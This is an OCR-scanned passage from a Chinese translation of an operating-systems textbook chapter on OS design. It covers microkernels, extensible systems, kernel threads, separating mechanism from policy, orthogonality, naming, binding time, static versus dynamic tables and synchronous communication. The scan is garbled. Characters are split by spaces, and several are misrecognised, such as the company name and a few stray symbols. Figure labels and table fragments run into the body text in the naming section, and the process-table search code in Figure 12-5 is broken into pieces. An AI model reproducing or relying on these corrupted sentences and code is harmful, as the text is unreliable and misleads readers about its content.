问题 建立 的 操作 系统 (Engler 等 人 ，1995 ) 。 

3. 基于 微 内 核 的 客户 -服务 器 系统 

在 让 操作 系统 做 每 件 事情 和 让 操作 系统 什么 也 不 做 之 间 的 折衷 是 让 操作 系统 做 一 点 事情 。 这 一 设计 
导致 微 内 核 的 出 现 ， 它 让 操作 系统 的 大 部 分 作为 用 户 级 的 服务 器 进程 而 运行 ， 如 图 12-3 所 示 。 在 所 有 设 
计 中 这 是 最 模块 化 和 最 灵活 的 。 在 灵活 性 上 的 极限 是 让 每 个 设备 驱动 程序 也 作为 一 个 用 户 进 程 而 运行 ， 
从 而 完全 保护 内 核 和 其 他 驱动 程序 ， 但 是 让 设备 驱动 程序 运行 在 内 核 会 增加 模块 化 程度 。 
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图 12-3 基于 微 内 核 的 客户 一 服务 器 计算 


当 设 备 驱 动 程序 运行 在 内 核 态 时 ， 可 以 直接 访问 硬件 设备 寄存 器 ， 否 则 需要 某 种 机 制 以 提供 这 样 的 
访问 。 如 果 硬 件 允 许 ， 可 以 让 每 个 驱动 程序 进程 仅 访问 它 需 要 的 那些 1O 设 备 。 例 如 ， 对 于 内 存 映 射 的 
IO， 每 个 驱动 程序 进程 可 以 拥有 页 面 将 它 的 设备 映射 进来 ， 但 是 没有 其 他 设备 的 页 面 。 如 果 IO 端 口 空 
间 可 以 部 分 地 加 以 保护 ， 就 可 以 保证 只 有 相应 的 正确 部 分 对 每 个 驱动 程序 可 用 。 

即使 没有 硬件 帮助 可 用 ， 仍 然 可 以 设法 使 这 一 思想 可 行 。 此 时 需要 的 是 一 个 新 的 系统 调用 ， 该 系统 
调用 仅 对 设备 驱动 程序 进程 可 用 ， 它 提供 一 个 (端口 ， 取 值 ) 对 列表 。 内 核 所 做 的 是 首先 进行 检查 以 了 
解 进程 是 否 拥 有 列表 中 的 所 有 端口 ， 如 果 是 ， 它 就 将 相应 的 取 值 复制 到 端口 以 发 起 设备 IO。 类 似 的 调 
用 可 以 用 来 读 1/O 端 口 。 

这 一 方法 使 设备 驱动 程序 避免 了 检查 (并 且 破 坏 ) 内 核 数 据 结 构 ， 这 (在 很 大 程度 上 ) 是 一 件 好 事 
情 。 一 组 类 似 的 调用 可 以 用 来 让 驱动 程序 进程 读 和 写 内 核 表格 ， 但 是 仅 以 一 种 受 控 的 方式 并 且 需 要 内 核 
的 批准 。 

这 一 方法 的 主要 问题 ， 并 且 一 般 而 言 是 针对 微 内 核 的 主要 问题 ， 是 额外 的 上 下 文 切换 导致 性 能 受到 
影响 。 然 而 ， 微 内 核 上 的 所 有 工作 实际 上 是 许多 年 前 当 CPU 还 非常 缓慢 的 时 候 做 的 。 如 今 ， 用 尽 CPU 的 
处 理 能 力 并 且 不 能 容忍 微小 性 能 损失 的 应 用 程序 是 十 分 稀少 的 。 毕 竟 ， 当 运行 一 个 字 处 理 器 或 Web 浏 览 
器 时 ，CPU 可 能 有 95% 的 时 间 是 空 闪 的。 如果 一 个 基于 微 内 核 的 操作 系统 将 一 个 不 可 靠 的 3.5GHz 的 系统 
转变 为 一 个 可 靠 的 3.0GHz 的 系统 ， 可 能 很 少 有 用 户 会 抱 忽 。 上 毕竟 ， 仅 仅 在 几 年 以 前 当 他 们 得 到 具有 
1GHz 的 速度 (就 当时 而 言 十 分 惊人 ) 的 系统 时 ， 大 多 数 用 户 是 相当 快乐 的 。 同 时 ， 当 处 理 器 不 再 是 稀 
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缺 资源 时 ， 目 前 尚 不 清楚 进程 间 通 信 的 开销 是 否 还 是 一 个 很 大 的 问题 。 如 果 每 个 设备 驱动 、 每 个 操作 系 
统 的 构件 都 有 它们 自己 专用 的 处 理 器 ， 那 么 进程 间 通 信 就 不 需要 上 下 文 切换 。 此 外 ， 高 速 缓 存 、 分 支 预 
测 以 及 TLB 都 已 经 做 好 准备 并 且 可 以 全 速 运行 。Hruby 等 人 (2013) 在 基于 微 内 核 的 高 性 能 操作 系统 上 
做 了 一 些 实验 。 

值得 注意 的 是 ， 虽 然 微 内 核 在 台式 机 上 并 不 流行 ， 但 是 在 手机 、 工 业 系统 、 伐 入 式 系统 和 军事 系统 
中 有 着 广泛 的 应 用 ， 在 这 些 系统 中 ， 高 可 靠 性 是 绝对 必要 的 。 同 时 ， 董 果 公司 运行 在 所 有 Mac 和 
Macbook 上 的 OS X 系 统 ， 都 包含 一 个 基于 Mach 微 内 核 的 修改 版 FreeBSD 系 统 。 

4. 可 扩展 的 系统 

对 于 上 面 讨论 的 客户 一 服务 器 系统 ， 思 想 是 让 尽 可 能 多 的 东西 脱离 内 核 。 相 反 的 方法 是 将 更 多 的 模 
块 放 到 内 核 中 ， 但 是 以 一 种 “ 受 保护 的 ”方式 。 当 然 ， 这 里 的 关键 字 是 受 保护 的 。 我 们 在 9.5.6 节 中 研究 
了 某 些 保 护 机 制 ， 这 些 机 制 最 初 打算 用 于 在 Internet 引 入 小 程序 ， 但 是 对 于 将 外 来 的 代码 插入 到 内 核 中 的 
过 程 同样 适用 。 最 重要 的 是 沙 盒 技术 和 代码 签名 ， 因 为 解释 对 于 内 核 代 码 来 说 实际 上 是 不 可 行 的 。 

当然 ， 可 扩展 的 系统 自身 并 不 是 构造 一 个 操作 系统 的 方法 。 然 而 ， 通 过 以 一 个 只 是 包含 保护 机 制 的 
最 小 系统 为 开端 ， 然 后 每 次 将 受 保护 的 模块 添加 到 内 核 中 ， 直 到 达到 期 望 的 功能 ， 对 于 手边 的 应 用 而 言 
一 个 最 小 的 系统 就 建立 起 来 了 。 按 照 这 一 观点 ， 对 于 每 一 个 应 用 ， 通 过 仅仅 包含 它 所 需要 的 部 分 ， 就 可 
以 拼装 出 一 个 新 的 操作 系统 。Paramecium 就 是 这 类 系统 的 一 个 实例 (Van Doorn, 2001), 

5. 内 核 线程 

此 处 ， 另 一 个 相关 的 问题 是 系统 线程 。 无 论 选择 哪 种 结构 模型 ， 允 许 存在 与 任何 用 户 进程 相隔 离 的 
内 核 线程 是 很 方便 的 。 这 些 线程 可 以 在 后 台 运 行 ， 将 脏 页 面 写 和 磁盘， 在 内 存 和 磁盘 之 间 交 换 进程 ， 如 
此 等 等 。 实 际 上 ， 内 核 本 身 可 以 完全 由 这 样 的 线程 构成 ， 所 以 当 一 个 用 户 发 出 系统 调用 时 ， 用 户 的 线程 
并 不 是 在 内 核 模式 中 运行 ， 而 是 阻塞 并 且 将 控制 传 给 一 个 内 核 线程 ， 该 内 核 线程 接管 控制 以 完成 工作 。 

除了 在 后 台 运 行 的 内 核 线程 以 外 ， 大 多 数 操作 系统 还 要 启动 许多 守护 进程 。 虽 然 这 些 守 护 进 程 不 是 
操作 系统 的 组 成 部 分 ， 但 是 它们 通常 执行 “系统 ”类 型 的 活动 。 这 些 活动 包括 接收 和 发 送 电子 邮件 ， 并 
且 对 远程 用 户 各 种 各 样 的 请 求 进行 服务 ， 例 如 FTP 和 Web 网 页 。 


12.3.2 机 制 与 策略 

另 一 个 有 助 于 体系 结构 一 致 性 的 原理 是 机 制 与 策略 的 分 离 ， 该 原理 同时 还 有 助 于 使 系统 保持 小 型 和 
良好 的 结构 。 通 过 将 机 制 放 入 操作 系统 而 将 策略 留 给 用 户 进程 ， 即 使 存在 改变 策略 的 需要 ， 系 统 本 身 也 
可 以 保持 不 变 。 即 使 策略 模块 必须 保留 在 内 核 中 ， 它 也 应 该 尽 可 能 地 与 机 制 相隔 离 ， 这 样 策略 模块 中 的 
变化 就 不 会 影响 机 制 模块 。 

为 了 使 策略 与 机 制 之 间 的 划分 更 加 清晰 ， 让 我 们 考虑 两 个 现实 世界 的 例子 。 第 一 个 例子 ， 考 虑 一 家 
大 型 公司 ， 该 公司 拥有 负责 向 员工 发 放 薪 水 的 工资 部 门 。 该 部 门 拥有 计算 机 、 软 件 、 空 白 支票 、 与 银行 
的 契约 以 及 更 多 的 机 制 ， 以 便 准 确 地 发 出 薪水 。 然 而 ， 确 定 谁 将 获得 多 少 薪水 的 策略 是 完全 与 机 制 分 开 
的 ， 并 且 是 由 管理 部 门 决定 的 。 工 资 部 门 只 是 做 他 们 被 吟 只 做 的 事情 。 

第 二 个 例子 ， 考 虑 一 家 饭店 。 它 拥有 提供 餐饮 的 机 制 , 包括 餐桌 、 和 餐具 、 服 务 员 、 充 满 设备 的 厨房 、 
与 食物 供应 商 和 信用 卡 公司 的 契约 ， 如 此 等 等 。 策 略 是 由 厨师 长 设 定 的 ， 也 就 是 说 ， 厨 师长 决定 菜单 上 
有 什么 。 如 果 厨 师长 决定 撤 掉 豆 腐 换 上 和 牛排， 那么 这 一 新 的 策略 可 以 由 现 有 的 机 制 来 处 理 。 

现在 让 我 们 考虑 某 些 操作 系统 的 例子 。 首 先 考虑 线程 调度 。 内 核 可 能 拥有 一 个 优先 级 调度 器 ， 具 有 
k 个 优先 级 。 机 制 是 一 个 数组 ， 以 优先 级 为 索引 ， 就 像 UINIX 和 Window 8 那样 。 每 个 数组 项 是 处 于 该 优先 
级 的 就 绪 线程 列表 的 表 头 。 调 度 器 只 是 从 最 高 优先 级 到 最 低 优 先 级 搜索 数组 ， 选 中 它 找 到 的 第 一 个 线程 。 
策略 是 设 定 优先 级 。 系 统 可 能 具有 不 同 的 用 户 类 别 ， 每 个 类 别 拥有 不 同 的 优先 级 。 它 还 可 能 允许 用 户 进 
程 设置 其 线程 的 相对 优先 级 。 优 先 级 可 能 在 完成 /0 之 后 增加 ， 或 者 在 用 完 时间 配 额 之 后 降低 。 还 有 众 
多 的 其 他 策略 可 以 遵循 ， 但 是 此 处 的 中 心思 想 是 设置 策略 与 执行 之 间 的 分 离 。 

第 二 个 例子 是 分 页 。 机 制 涉及 MMU 管 理 ， 维 护 占用 页 面 与 空闲 页 面 的 列表 ， 以 及 用 来 将 页 面 移入 磁 
盘 或 者 移出 磁盘 的 代码 。 策 略 是 当 页 面 故障 发 生 时 决定 做 什么 ， 它 可 能 是 局 部 的 或 全 局 的 ， 基 于 LRU 的 
或 基于 FIFO 的 ， 或 者 是 别 的 东西 ， 但 是 这 一 算法 可 以 〈 并 且 应 该 ) 完全 独立 于 管理 页 面 的 机 制 。 
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第 三 个 例子 是 允许 将 模块 装载 到 内 核 之 中 。 机 制 关心 的 是 它们 如 何 被 插入 、 如 何 被 链接 、 它 们 可 以 
发 出 什么 调用 ， 以 及 可 以 对 它们 发 出 什么 调用 。 策 略 确定 谁 能 够 将 模块 装载 到 内 核 之 中 以 及 装载 哪些 模 
块 等 。 也 许 只 有 超级 用 户 可 以 装载 模块 ， 也 许 任何 用 户 都 可 以 装载 被 适当 权威 机 构 数字 签名 的 模块 。 


12.3.3 正 交 性 

良好 的 系统 设计 在 于 单独 的 概念 可 以 独立 地 组 合 。 例 如 ， 在 C 语 言 中 ， 存 在 基本 的 数据 类 型 ， 包 括 
整数 、 字 符 和 浮 点 数 ， 还 存在 用 来 组 合 数据 类 型 的 机 制 ， 包 括 数组 、 结 构 体 和 联合 体 。 这 些 概念 独立 地 
组 合 ， 允 许 拥有 整数 数组 、 字 符 数 组 、 泽 点数 的 结构 和 联合 成 员 等 。 实 际 上 ,一旦 定义 了 一 个 新 的 数据 
类 型 ， 如 整数 数组 ， 就 可 以 如 同一 个 基本 数据 类 型 一 样 使 用 它 ， 例 如 作为 一 个 结构 或 者 一 个 联合 的 成 员 。 
独立 地 组 合 单独 的 概念 的 能 力 称 为 正 交 性 (orthogonality) ， 它 是 简单 性 和 完整 性 原理 的 直接 结果 。 

正 交 性 概念 还 以 各 种 各 样 的 其 他 形式 出 现在 操作 系统 中 ，Linux 的 clone 系 统 调 用 就 是 一 个 例子 ， 它 
创建 一 个 新 线程 。 该 调用 有 一 个 位 图 作为 参数 ， 它 允许 单独 地 共享 或 复制 地 址 空间 、 工 作 目 录 、 文 件 描 
述 符 以 及 信和 号。 如果 复制 所 有 的 东西 ， 我 们 将 得 到 一 个 进程 ， 就 像 调 用 fork 一 样 。 如 果 什 么 都 不 复制 ， 
则 是 在 当前 进程 中 创建 一 个 新 线程 。 然 而 ， 创 建 共享 的 中 间 形 式 同样 也 是 可 以 的 ， 而 这 在 传统 的 UNIX 
系统 中 是 不 可 能 的 。 通 过 分 离 各 种 特性 并 且 使 它们 正 交 ， 是 可 以 做 到 更 好 地 控制 自由 度 的 。 

正 交 性 的 另 一 个 应 用 是 Windows 8 中 进程 概念 与 线程 概念 的 分 离 。 进 程 是 一 个 资源 容器 ， 既 不 多 也 
不 少 。 线 程 是 一 个 可 调度 的 实体 。 当 把 另 一 个 进程 的 句柄 提供 给 一 个 进程 时 ， 它 拥有 多 少 个 线程 都 是 没 
有 关系 的 。 当 一 个 线程 被 调度 时 ， 它 从 属于 哪个 进程 也 是 没有 关系 的 。 这 些 概 念 是 正 交 的 。 

正 交 性 的 最 后 一 个 例子 来 自 UNIX。 在 UNIX 中 ， 进 程 的 创建 分 两 步 完 成 : fork 和 exec。 创 建新 的 地 
址 空间 与 用 新 的 内 存 映像 装载 该 地 址 空间 是 分 开 的 ， 这 就 为 在 两 者 之 间 做 一 些 事情 提供 了 可 能 (例如 处 
理 文件 描述 符 )。 在 Windows 8 中 ， 这 两 个 步骤 不 能 分 开 ， 也 就 是 说 ， 创 建新 的 地 址 空间 与 填充 该 地 址 空 
间 的 概念 不 是 正 交 的 。Linux 的 clone 加 exec 序 列 是 更 加 正 交 的 ， 因 为 存在 更 细 粒 度 的 构造 块 可 以 利用 。 
作为 一 般 性 的 规则 ， 拥 有 少量 能 够 以 很 多 方式 组 合 的 正 交 元 素 ， 将 形成 小 巧 、 简 单 和 精致 的 系统 。 


12.3.4 命名 

操作 系统 大 多 数 较 长 使 用 的 数据 结构 都 具有 某 种 名 字 或 标识 符 ， 通 过 这 些 名 字 或 标识 符 就 可 以 引用 
这 些 数 据 结构 。 显 而 易 见 的 例子 有 注册 名 、 文 件 名 、 设 备 名 、 进 程 ID 等 。 在 操作 系统 的 设计 与 实现 中 ， 
如 何 构造 和 管理 这 些 名 字 是 一 个 重要 的 问题 。 

为 人 们 的 使 用 而 设计 的 名 字 是 ASCII 或 Unicode 形 式 的 字符 串 ， 并 且 通 常 是 层次 化 的 。 目 录 路 径 ， 
例如 /usr/ast/books/mos4/chap-12， 显 然 是 层次 化 的 ， 它 指出 从 根 目录 开始 搜索 的 一 个 目录 序列 。URL 也 
是 层次 化 的 。 例 如 ，www.cs.vu.nl/~ast/ 表 示 一 个 特定 国家 (nl) 的 一 所 特定 大 学 (vu) 的 一 个 特定 的 系 
(cs) 内 的 一 台 特 定 的 机 器 (www)。 斜 线 号 后 面 的 部 分 指出 的 是 目标 机 器 上 的 一 个 特定 的 文件 ， 在 这 种 
情形 中 ， 按 照 惯例 ， 该 文件 是 ast 主 目录 中 的 www/index,.html。 注 意 URL (以 及 一 般 的 DNS 地 址 ， 包 括 电 
子 邮 件 地 址 ) 是 “ 反 向 的 "， 从 树 的 底部 开始 并 且 向 上 走 ， 这 与 文件 名 有 所 不 同 ， 后 者 从 树 的 顶部 开始 
并 且 向 下 走 。 看 待 这 一 问题 的 另 一 种 方法 是 从 头 写 这 棵 树 是 从 左 开始 向 右 走 ， 还 是 从 右 开始 向 左 走 。 

命名 经 常 在 外 部 和 内 部 两 个 层次 上 实现 。 例 如 ， 文 件 总 是 具有 以 ASCII 或 Unicode 编 码 的 字符 串 名 字 以 供 
人 们 使 用 。 此 外 ， 几 乎 总 是 存 ee 

S > 部 名 字 : /usr/ast/books/mos2/Chap-12 
在 一 个 内 部 名 字 由 系统 使 用 。 3 


在 UNIX 中 ， 文 件 的 实际 名 字 是 — 
它 的 节点 号 ， 在 内 部 根本 就 不 目录 aaaayboaiahmcaa ;地 点 表 


使 用 ASCI 名 字 。 实 际 上 ， 它 甚 | Chap-10 | 114 | za, 











至 不 是 唯一 的 ， 因 为 一 个 文件 [on | 6 | le 
可 能 具有 多 个 链接 指向 它 。 在 Ce 2 -一 一 
Windows 8 中 ， 相 仿 的 内 部 名 字 a AMA: 2 


是 MFT 中 文件 的 索引 。 目 录 的 Wr 
任务 是 在 外 部 名 字 和 内 部 名 字 
之 间 提 供 映射 ， 如 图 12-4 所 示 。 图 12-4 目录 用 来 将 外 部 名 字 映 射 到 内 部 名 字 上 
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在 许多 情况 下 (例如 上 面 给 出 的 文件 名 的 例子 )， 内 部 名 字 是 一 个 无 符号 整数 ， 用 作 进 入 一 个 内 部 
表格 的 索引 。 表 格 -- 索 引 名 字 的 其 他 例子 还 有 UNIX 中 的 文件 描述 符 和 Windows 8 中 的 对 象 句柄 。 注 意 这 
些 都 没有 任何 外 部 表示 ， 它 们 严格 地 被 系统 和 运行 的 进程 所 使 用 。 一 般 而 言 ， 对 于 当 系 统 重新 启动 时 就 
会 丢失 的 暂时 的 名 字 ， 使 用 表格 索引 是 一 个 很 好 的 主意 。 

操作 系统 经 常 支持 多 个 名 字 空 间 ， 既 在 内 部 又 在 外 部 。 例 如 ， 在 第 11 章 我 们 了 解 了 Windows 8 支持 
的 三 个 外 部 名 字 空 间 : 文件 名 、 对 象 名 和 注册 表 名 (并 且 还 有 我 们 没有 考虑 的 活动 目录 名 )。 此 外 ， 还 
存在 着 使 用 无 符号 整数 的 数 不 清 的 内 部 名 字 空 间 ， 例 如 对 象 句柄 、MFT 项 等 。 尽 管 外 部 名 字 空 间 中 的 名 
字 都 是 Unicode 字 符 串 ， 但 是 在 注册 表 中 查寻 一 个 文件 名 是 不 可 以 的 ， 正 如 在 对 象 表 中 使 用 MET 索 引 是 
不 可 以 的 。 在 一 个 良好 的 设计 中 ， 相 当 多 的 考虑 花 在 了 需要 多 少 个 名 字 空间 ， 每 个 名 字 空间 中 名 字 的 语 
法 是 什么 ， 怎 样 分 辨 它们 ， 是 否 存在 抽象 的 和 相对 的 名 字 ， 如 此 等 等 。 


12.3.5 绑 定 的 时 机 

正如 我 们 刚刚 看 到 的 ， 操 作 系统 使 用 多 种 类 型 的 名 字 来 引用 对 象 。 有 时 在 名 字 和 对 象 之 间 的 映射 是 
固定 的 ， 但 是 有 时 不 是 。 在 后 一 种 情况 下 ， 何 时 将 名 字 与 对 象 绑 定 可 能 是 很 重要 的 。 一 般 而 言 ， 早 期 绑 
Æ (early binding) 是 简单 的 ， 但 是 不 灵活 ， 而 晚期 绑 定 (late binding) 则 比较 复杂 ， 但 是 通常 更 加 灵活 。 

为 了 阐明 绑 定时 机 的 概念 ， 让 我 们 看 一 看 某 些 现实 世界 的 例子 。 早 期 绑 定 的 一 个 例子 是 某 些 高 等 学 
校 允许 父母 在 婴儿 出 生 时 登记 入 学 ， 并 且 预 付 当 前 的 学 费 。 以 后 当 学 生长 大 到 18 岁 时 ， 学 费 已 经 全 部 付 
清 ， 无 论 此 刻 学 费 有 多 么 高 。 

在 制造 业 中 ， 预 先 定购 零 部 件 并 且 维 持 零 部 件 的 库存 量 是 早期 绑 定 。 相 反 ， 即 时 制造 要 求 供 货 商 能 
够 立刻 提供 零 部 件 ， 不 需要 事先 通知 。 这 就 是 晚期 绑 定 。 

程序 设计 语言 对 于 变量 通常 支持 多 种 绑 定 时 机 。 编 译 器 将 全 局 变量 绑 定 到 特殊 的 虚拟 地 址 ， 这 是 早 
期 绑 定 的 例子 。 过 程 的 局 部 变量 在 过 程 被 调用 的 时 刻 (在 栈 中 ) 分 配 一 个 虚拟 地 址 ， 这 是 中 间 绑 定 。 存 
放 在 堆 中 的 变量 (这 些 变量 由 C 中 的 malloc 或 Java 中 的 new 分 配 ) 仅仅 在 它们 实际 被 使 用 的 时 候 才 分 配 虚 
拟 地 址 ， 这 便 是 晚期 绑 定 。 

操作 系统 对 大 多 数 数 据 结构 通常 使 用 早期 绑 定 ， 但 是 偶尔 为 了 灵活 性 也 使 用 晚期 绑 定 。 内 存 分 配 是 
一 个 相关 的 案例 。 在 缺乏 地 址 重 定位 硬件 的 机 器 上 ， 早 期 的 多 道 程序 设计 系统 不 得 不 在 某 个 内 存 地 址 装 
载 一 个 程序 ， 并 且 对 其 重 定位 以 便 在 此 处 运行 。 如 果 它 曾经 被 交换 出 去 ， 那 么 它 就 必须 装 回 到 相同 的 内 
存 地 址 ， 否 则 就 会 出 错 。 相 反 ， 页 式 虚拟 内 存 是 晚期 绑 定 的 一 种 形式 。 在 页 面 被 访问 并 且 实 际 装 和 内存 
之 前 ， 与 一 个 给 定 的 虚拟 地 址 相对 应 的 实际 物理 地 址 是 不 知道 的 。 

晚期 绑 定 的 另 一 个 例子 是 GUI 中 窗口 的 放置 。 在 早期 图 形 系统 中 ， 程 序 员 必须 为 屏幕 上 的 所 有 图 像 
设 定 绝对 屏幕 坐标 ， 与 此 相对 照 ， 在 现代 GUI 中 ， 软 件 使 用 相对 于 窗口 原点 的 坐标 ， 但 是 在 窗口 被 放置 
在 屏幕 上 之 前 该 坐标 是 不 确定 的 ， 并 且 以 后 ， 它 甚至 是 可 能 改变 的 。 


12.3.6 静态 与 动态 结构 

操作 系统 设计 人 员 经 常 被 迫 在 静 态 与 动态 数据 结构 之 间 进 行 选择 。 静 态 结构 总 是 简单 易 懂 ， 更 加 容 
易 编 程 并 且 用 起 来 更 快 ， 动态 结构 则 更 加 灵活 。 一 个 显而易见 的 例子 是 进程 表 。 早 期 的 系统 只 是 分 配 一 
个 固定 的 数组 ， 存 放 每 个 进程 结构 。 如 果 进 程 表 由 256 项 组 成 ， 那 么 在 任意 时 刻 只 能 存在 256 个 进程 。 试 
图 创建 第 257 个 进程 将 会 失败 ， 因 为 缺乏 表 空间 。 类 似 的 考虑 对 于 打开 的 文件 表 (每 个 用 户 的 和 系统 范 
围 的 ) 以 及 许多 其 他 内 核 表 格 也 是 有 效 的 。 

一 个 替代 的 策略 是 将 进程 表 建 立 为 一 个 小 型 表 的 链表 ， 最 初 只 有 一 个 表 。 如 果 该 表 被 填 满 ， 可 以 从 
全 局 存储 池 中 分 配 另 一 个 表 并 且 MERTE 


将 其 链接 到 前 一 个 表 。 这 样 ， 在 for (p = &proc_table[0]; p < &proc_table[PROC_TABLE_SIZE]; p++) { 
全 部 内 核 内 存 被 耗 尽 之 前 ， 进 程 人 
表 不 可 能 被 填 满 。 break; ; 
另 一 方面 ， 搜 索 表格 的 代码 p% 
会 变 得 更 加 复杂 。 例 如 ， 在 图 12-5 


中 给 出 了 搜索 一 个 静态 进程 表 以 图 12-5 对 于 给 定 PID 搜 索 进程 表 的 代码 
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查找 给 定 PID ，pid 的 代码 。 该 代码 简单 有 效 。 对 于 小 型 表 的 链表 ， 做 同样 的 搜索 则 需要 更 多 的 工作 。 

当 存在 大 量 的 内 存 或 者 当 表 的 利用 可 以 猜测 得 相当 准确 时 ， 静 态 表 是 最 佳 的 。 例 如 ， 在 一 个 单 用 户 
系统 中 ， 用 户 不 太 可 能 立刻 启动 128 个 以 上 的 进程 ， 并 且 如 果 试 图 启动 第 129 个 进程 失败 了 ， 也 并 不 是 一 
个 彻底 的 灾难 。 

还 有 另 一 种 选择 是 使 用 一 个 固定 大 小 的 表 ， 但 是 如 果 该 表 填 满 了 ， 就 分 配 一 个 新 的 固定 大 小 的 表 ， 
比方 说 大 小 是 原来 的 两 倍 。 然 后 将 当前 的 表 项 复制 到 新 表 中 并 且 把 旧 表 返回 空闲 存储 池 。 这 样 ， 表 总 是 
连续 的 而 不 是 链接 的 。 此 处 的 缺点 是 需要 某 些 存储 管理 ， 并 且 现 在 表 的 地 址 是 变量 而 不 是 常量 。 

对 于 内 核 栈 也 存在 类 似 的 问题 。 当 一 个 线程 切换 到 内 核 模式 ， 或 者 当 一 个 内 核 模式 线程 运行 时 ， 它 
在 内 核 空间 中 需要 一 个 栈 。 对 于 用 户 线程 ， 栈 可 以 初始 化 成 从 虚拟 地 址 空间 的 顶部 向 下 生长 ， 所 以 大 小 
不 需要 预先 设 定 。 对 于 内 核 线程 ， 大 小 必须 预先 设 定 ， 因 为 栈 占据 了 某 些 内 核 虚拟 地 址 空间 并 且 可 能 存 
在 许多 栈 。 问 题 是 : 每 个 栈 应 该 得 到 多 少 空间 ? 此 处 的 权衡 与 进程 表 是 类 似 的 ， 将 关键 的 数据 结构 变 成 
动态 的 是 可 以 的 ， 但 是 很 复杂 。 

另 一 个 静态 -动态 权衡 是 进程 调度 。 在 某 些 系 统 中 ， 特 别 是 在 实时 系统 中 ， 调 度 可 以 预先 静态 地 完 
成 。 例 如 ， 航 空 公司 在 班机 启 航 前 几 周 就 知道 它 的 飞机 什么 时 候 要 出 发 。 类 似 地 ， 多 媒体 系统 预先 知道 
何 时 调度 音频 、 视 频 和 其 他 进程 。 对 于 通用 的 应 用 ， 这 些 考 虑 是 不 成 立 的 ， 并 且 调 度 必须 是 动态 的 。 

还 有 一 个 静态 -动态 问题 是 内 核 结构 。 如 果 内 核 作为 单一 的 二 进 制程 序 建立 并 且 装载 到 内 存 中 运行 ， 
情况 是 比较 简单 的 。 然 而 ， 这 一 设计 的 结果 是 添加 一 个 新 的 IO 设备 就 需要 将 内 核 与 新 的 设备 驱动 程序 
重新 链接 。UNIX 的 早期 版 本 就 是 以 这 种 方式 工作 的 ， 在 小 型 计算 机 环境 中 它 相 当 令 人 满意 ， 那 时 添加 
新 的 IO 设备 是 十 分 罕见 的 事情 。 如 今 ， 大 多 数 操作 系统 允许 将 代码 动态 地 添加 到 内 核 之 中 ， 随 之 而 来 
的 则 是 所 有 额外 的 复杂 性 。 


12.3.7 自 项 向 下 与 自 底 向 上 的 实现 

虽然 最 好 是 自 顶 向 下 地 设计 系统 ， 但 是 在 理论 上 系统 可 以 自 顶 向 下 或 者 自 底 向 上 地 实现 。 在 自 顶 向 
下 的 实现 中 ， 实 现 者 以 系统 调用 处 理 程序 为 开端 ， 并 且 探 究 需要 什么 机 制 和 数据 结构 来 支持 它们 。 接 着 
编写 这 些 过 程 等 ， 直 到 触及 硬件 。 

这 种 方法 的 问题 是 ， 由 于 只 有 顶层 过 程 可 用 ， 任 何事 情 都 难于 测试 。 出 于 这 样 的 原因 ， 许 多 开发 
人 员 发 现实 际 上 自 底 向 上 地 构建 系统 更 加 可 行 。 这 一 方法 需要 首先 编写 隐藏 底层 硬件 的 代码 ， 特 别 是 
图 11-4 中 的 HAL。 中 断 处 理 程序 和 时 钟 驱动 程序 也 是 早期 就 需要 的 。 

然后 ， 可 以 使 用 一 个 简单 的 调度 器 (例如 轮转 调度 ) 来 解决 多 道 程序 设计 问题 。 在 这 一 时 刻 ， 测 试 
系统 以 了 解 它 是 否 能 够 正确 地 运行 多 个 进程 应 该 是 可 能 的 。 如 果 运 转正 常 ， 此 时 可 以 开始 仔细 地 定义 贯 
穿 系统 的 各 种 各 样 的 表格 和 数据 结构 ， 特 别 是 那些 用 于 进程 和 线程 管理 以 及 后 面 内 存 管理 的 表格 与 数据 
结构 。I/O 和 文件 系统 在 最 初 可 以 等 一 等 ， 用 于 测试 和 调试 目的 的 读 键盘 与 写 屏幕 的 基本 方法 除外 。 在 
某 些 情况 下 ， 关 键 的 低层 数据 结构 应 该 得 到 保护 ， 这 可 以 通过 只 允许 经 由 特定 的 访问 过 程 来 访问 而 实现 一 一 
实际 上 这 是 面向 对 象 的 程序 设计 思想 ， 不 论 采 用 何 种 程序 设计 语言 。 当 较 低 的 层次 完成 时 ， 可 以 彻底 地 
测试 它们 。 这 样 ， 系 统 自 底 向 上 推进 ， 很 像 是 建筑 商 建造 高 层 办 公 楼 的 方式 。 

如 果 有 一 个 大 型 编程 团队 可 用 ， 那 么 替代 的 方法 是 首先 做 出 整个 系统 的 详细 设计 ， 然 后 分 配 不 同 的 
小 组 编写 不 同 的 模块 。 每 个 小 组 独立 地 测试 自己 的 工作 。 当 所 有 的 部 分 都 准备 好 时 ， 可 以 将 它们 集成 起 
来 并 加 以 测试 。 这 一 设计 方式 存在 的 问题 是 ， 如 果 最 初 没 有 什么 可 以 运转 ， 可 能 难于 分 离 出 一 个 或 多 个 
模块 是 否 工作 不 正常 ， 或 者 一 个 小 组 是 否 误解 了 某 些 其 他 模块 应 该 做 的 事情 。 尽 管 如 此 ， 如 果 有 大 型 团 
队 ， 还 是 经 常 使 用 该 方法 使 程序 设计 工作 中 的 并 行程 度 最 大 化 。 


12.3.8 同步 通信 与 异步 通信 

另 一 个 经 常 在 操作 系统 设计 者 之 间 引 发 争论 的 话题 是 系统 构件 间 的 通信 应 该 是 同步 还 是 异步 的 (还 
A, 与 此 相关 的 ， 线 程 是 否 比 事件 好 )。 这 个 话题 经 常 引发 两 个 阵营 的 支持 者 之 间 热 烈 的 争论 ， 当 然 争 
论 并 不 像 决定 真正 重要 的 事情 时 (比如 vi 和 emacs 哪 个 是 最 好 的 编辑 器 ) 那么 激烈 。 我 们 使 用 8.2 节 ( 宽 
松 ) 的 定义 “同步 ”来 表示 调用 会 阻塞 直到 完成 。 相 反 , “异步 ”表示 调用 者 继续 执行 。 这 两 种 模式 有 
着 各 自 的 优 缺 点 。 
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一 些 操作 系统 (比如 Amoeba) 相当 推崇 同步 设计 ， 因 此 把 进程 间 通 信 实 现 为 阻塞 的 客户 端 - 服 务 
器 端 调 用 。 完 全 的 同步 通信 在 概念 上 很 简单 。 一 个 进程 发 送 一 个 请 求 ， 然 后 阻塞 直到 回复 到 达 ， 还 有 比 
这 更 简单 的 吗 ? 当 有 很 多 客户 端 都 在 请 求 服务 器 的 服务 时 ， 情 况 变 得 有 些 复杂 。 每 个 单独 的 请 求 可 能 会 
被 阻塞 很 长 时 间 来 等 待 其 他 的 请 求 响 应 完毕 。 这 个 问题 可 以 通过 让 服务 器 使 用 多 线程 来 解决 ， 这 样 每 个 
线程 可 以 处 理 一 个 客户 端 请 求 。 这 个 模型 在 现实 中 的 很 多 实现 中 都 尝试 和 测试 过 ， 包 括 操作 系统 和 用 户 
应 用 程序 。 

